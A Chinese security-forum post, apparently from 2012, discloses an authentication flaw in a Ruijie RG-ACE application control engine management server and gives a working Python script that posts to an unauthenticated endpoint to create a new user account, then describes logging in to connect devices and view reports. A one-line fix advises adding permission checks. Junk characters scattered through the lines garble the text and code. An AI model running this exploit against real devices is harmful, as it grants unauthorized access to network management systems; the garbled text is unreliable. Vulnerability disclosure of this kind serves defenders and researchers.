找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2081|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)) ?  f0 f- z" u, {+ E% K
* ]3 v7 c" F3 H% l# ^" o; J# G2 ^
; v# `4 Z9 L) C8 V
测试的具体版本是
1 z! F6 H7 m  T  |$ _' G产品名称: 锐捷应用控制引擎8 ?: Z* S% k4 Z! I/ y5 A, q' r2 U
版本号: 3.1.36.001 TC
4 d% x+ p1 n  `2 d$ c编译时间: 201104291730
$ Q* D: }1 a: [# Y+ _
5 x' w* J1 i; g$ }& g, K, x2 ]
, W2 t( Z4 S% ]8 _) a漏洞证明:
8 ~! V; X  y8 [8 U5 z, Y4 c; R - C" Y" p; o6 R
' G3 d1 W* J2 M3 J$ d# h& Q% u( f
1 a2 w7 l3 I4 p  X3 ?
& }: P9 Y; J1 R. H; j" z; v% p/ E: C
9 P0 q5 Z" l; B! h% O8 B  U

5 V; w: l  Z1 N1 u. E; V; o3 g( c! |执行脚本
; G2 R* `# j1 t7 ?1 d* C$ _2 e#! /usr/bin/env python
' [0 M1 o& c) P' U  e( q0 k7 f  E#coding=gbk  m" f% r& s* h1 x& `% K( _  g
#RG-ACE管理服务器 V3.1.36.001" e0 }" F$ B! e3 [1 p6 \
import urllib2, urllib,cookielib8 S5 ^( O" l, A5 U
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
7 H, r, p# w% ropener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))3 o. }4 u7 ]. B( g
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]6 v! B" V- R. W! V
post=(("event","userManager.doInsertUserInfo"),  I5 A: Z9 ]8 `9 [1 l# x* `4 w+ p7 `
("useractionname","addButtonValue"),
- M% e/ c3 G* [$ {- h4 M("useropermanager","userManager"),1 ]" c2 M4 [& S" d3 O( T1 l3 e
("userName","t"), #######账号自己加+ [9 m$ z9 [+ y! K& e& z" d7 l
("pwd","aaaaaa"),######密码自己加7 g+ L9 p0 D* s: _# n, N: k
("trueName","ad"),/ G. P# G7 O: L) ]9 x* g& v, p( N
("email",""),
, ]% j' P0 i6 ~" o! m# L("mobilePhone",""),
+ o# g9 N, X' r  U4 R& c; ]# |("officePhone",""),% G) f  k1 |( Z+ _$ V8 p9 D
("addr",""),
& L3 u2 q- X( K5 Z1 k# r  M("submit","确定"))
( S& W1 N$ G; U+ P, l: Jurllib2.install_opener(opener)2 r' w9 U: F* G- r
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
) m6 y6 a2 T! b& Q' \4 Cprint "Done"
, u& D0 l6 t* W* _& h3 ^% O" U! U+ v% h0 e& l9 g
登录,连接设备! }9 [3 _! w' S0 e( @
/ l" \0 s: d" a7 ~$ f, y
1 w2 X# N# ]2 u! a
8 B% i3 ^* L# ?( @7 L9 }
" b: L& M3 H4 A6 c2 j4 P# X2 i
- J5 E  a6 R& ^+ @4 f$ v) B. b
默认的管理员admin权限更大点! @+ I- t* y% a* S- B* h& K0 T

7 t5 |4 z% s0 [% g- k' q) G* N6 \- K& v7 w" b
$ b) e  o3 j; p' ^% k/ ?; s2 e, v

; z0 [, Q9 J8 d1 Y: r$ O, a
4 u  [* w6 n& N7 E9 }. q* F修复方案:) v( U( C; x" J/ d; j1 E$ l# I. w
加强对接口的权限验证
) e# [/ J9 }! U+ l) F. |
( m1 V- C; _- ?. v2 d
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表